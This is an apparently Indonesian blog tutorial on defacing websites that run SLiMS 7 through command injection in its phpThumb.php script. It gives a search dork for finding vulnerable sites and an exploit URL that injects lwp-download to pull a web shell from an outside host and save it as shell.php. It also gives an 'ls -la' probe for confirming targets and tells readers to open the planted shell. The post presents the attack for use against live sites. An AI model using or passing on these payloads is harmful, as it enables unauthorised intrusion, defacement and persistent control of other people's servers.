Deface Slims7 phpThumb Command Injection
Yo Kali Ini Gue Mau Kasih Tutorial Deface Slims7 phpThumb Command Injection :'3 Disini Gue Buat Jadi Simple Aja Karena Males Ngetik Wkwkwk Langsung Aja
Reff : https://medium.com/@iqbalxhalim/multiple-web-vulnerablities-pada-slims7-rce-xss-csrf-66e42fb7d1fd
Dork : intext:"Powered By Slims"
Exploit : /lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;lwp-download http://shell.com/aw.txt shell.php;&phpThumbDebug=9
Disini Gue Udah Ada Target Langsung Aja Kita Ekse Buat Tau Web Itu Tersebut Vuln Atau Tidak Kalian Tinggal Mengganti Command Menjadi ls -la
/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlaceline file.jpg jpeg:file.jpg ;ls -la; &phpThumbDebug=9
Kalo Web Tersebut Menampilkan Directory Files Tandanya Vuln Seperti Gambar Dibawah Ini
Langsung Aja Kita Masukan Exploitnya Untuk Wget Shellnya Ketika Setelah Wget Tampilannya Akan Seperti Gambar Dibawah Ini
Langsung Aja Kita Cek Shellnya Di [path]/lib/watermark/shell.php
Duar Ppk Oke Segitu Aja Tutorial Dari Gue Wkwkwk
0 Response to "Deface Slims7 phpThumb Command Injection"
Post a Comment